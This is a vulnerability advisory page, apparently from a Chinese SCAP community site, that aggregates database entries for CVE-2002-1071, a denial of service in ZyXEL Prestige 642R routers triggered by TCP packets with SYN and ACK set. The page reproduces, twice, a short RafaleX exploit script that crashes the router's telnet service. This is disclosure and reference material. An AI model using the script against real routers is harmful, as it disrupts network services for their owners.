CVE-2002-1071
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:42
NMCOES    

[原文]ZyXEL Prestige 642R allows remote attackers to cause a denial of service in the Telnet, FTP, and DHCP services (crash) via a TCP packet with both the SYN and ACK flags set.


[CNNVD]Zyxel Prestige 642R机型数据包拒绝服务漏洞(CNNVD-200210-020)

        ZyXEL Prestige 642R存在漏洞。远程攻击者可以借助同时带有设置SYN和ACK标志位的TCP数据包导致Telnet,FTP,和DHCP服务拒绝(崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/h:zyxel:prestige:642r
cpe:/h:zyxel:prestige:310

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1071
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1071
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-020
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5034
(VENDOR_ADVISORY)  BID  5034
http://www.iss.net/security_center/static/9372.php
(VENDOR_ADVISORY)  XF  zyxel-tcp-packet-dos(9372)
http://online.securityfocus.com/archive/1/277307
(UNKNOWN)  BUGTRAQ  20020617 Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS -- 643R testing
http://online.securityfocus.com/archive/1/277303
(UNKNOWN)  BUGTRAQ  20020617 Follow: ZyXEL 642R-11 AJ.6 service DoS -- additional informations
http://online.securityfocus.com/archive/1/277242
(UNKNOWN)  BUGTRAQ  20020617 ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS

- 漏洞信息

Zyxel Prestige 642R机型数据包拒绝服务漏洞
中危 其他
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        ZyXEL Prestige 642R存在漏洞。远程攻击者可以借助同时带有设置SYN和ACK标志位的TCP数据包导致Telnet,FTP,和DHCP服务拒绝(崩溃)。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21561)

Zyxel Prestige 642R Malformed Packet Denial Of Service Vulnerability (EDBID:21561)
hardware dos
2002-07-17 Verified
0 Kistler Ueli
N/A [点击下载]
source: http://www.securityfocus.com/bid/5034/info

ZyXEL 642R routers have difficulties handling certain types of malformed packets. In particular, it is possible to deny services by sending a vulnerable router a SYN-ACK packet. To a lesser degree, the router also encounters difficulties when handling SYN-FIN packets. In both instances, some services provided by the router (telnet, FTP and DHCP) will be denied, however, the device will continue to route network traffic. This issue has also been reproduced with other types of malformed packets.

ZyXEL 642R-11 and Prestige 310 routers are reportedly affected by this vulnerability. It is possible that other ZyNOS-based routers are also affected by this vulnerability. ZxXEL 643 ADSL routers do not appear to be prone to this issue.

This issue may be exploited in combination with the vulnerability described in Bugtraq ID 3346. 

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed
(V2.50(AJ.6))

!Sleep 1000

!Display=$done 		

- 漏洞信息

9982
ZyXEL Prestige 642R Malformed TCP Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

The ZyXEL Prestige 642R router contains a flaw that may allow a remote denial of service. The issue is triggered when a remote attacker send a TCP packet with the SYN and ACK flags set, and will result in loss of availability for the device short period of time.

- 时间线

2002-07-17 Unknow
2002-07-17 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Zyxel Prestige 642R Malformed Packet Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 5034
Yes No
2002-06-17 12:00:00 2009-07-11 01:56:00
Discovery of this issue is credited to Kistler Ueli <iuk@gmx.ch>.

- 受影响的程序版本

ZyXEL Prestige 642R
ZyXEL Prestige 310
ZyXEL Prestige 643

- 不受影响的程序版本

ZyXEL Prestige 643

- 漏洞讨论

ZyXEL 642R routers have difficulties handling certain types of malformed packets. In particular, it is possible to deny services by sending a vulnerable router a SYN-ACK packet. To a lesser degree, the router also encounters difficulties when handling SYN-FIN packets. In both instances, some services provided by the router (telnet, FTP and DHCP) will be denied, however, the device will continue to route network traffic. This issue has also been reproduced with other types of malformed packets.

ZyXEL 642R-11 and Prestige 310 routers are reportedly affected by this vulnerability. It is possible that other ZyNOS-based routers are also affected by this vulnerability. ZxXEL 643 ADSL routers do not appear to be prone to this issue.

This issue may be exploited in combination with the vulnerability described in Bugtraq ID 3346.

- 漏洞利用

The following example script was submitted:

# This is a RafaleX script (Download: www.packx.net)
# Rafale X script
# ---------------
# Action : Make a ZyXEL 642R Prestige Router inaccessible on port 23
#
%name=ZyXEL telnet service DoS
%category=Denial of service
%date=23-05-2002
%rafalemin=0.2
%description=Crash ZyXEL router telnet service with ACK and SYN flag

// Variables
$done=Target attacked...

// Do the stuff...
!Display=Please wait...
!Sleep 500
PORTDST=23
IPHEADERSIZE=20
ACK=1
SYN=1
!Display=Sending the packet...
!SEND 1 TCP
!Sleep 200
!Display=ACK/SYN Packet sent! ZyXEL telnet service crashed
(V2.50(AJ.6))

!Sleep 1000

!Display=$done

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站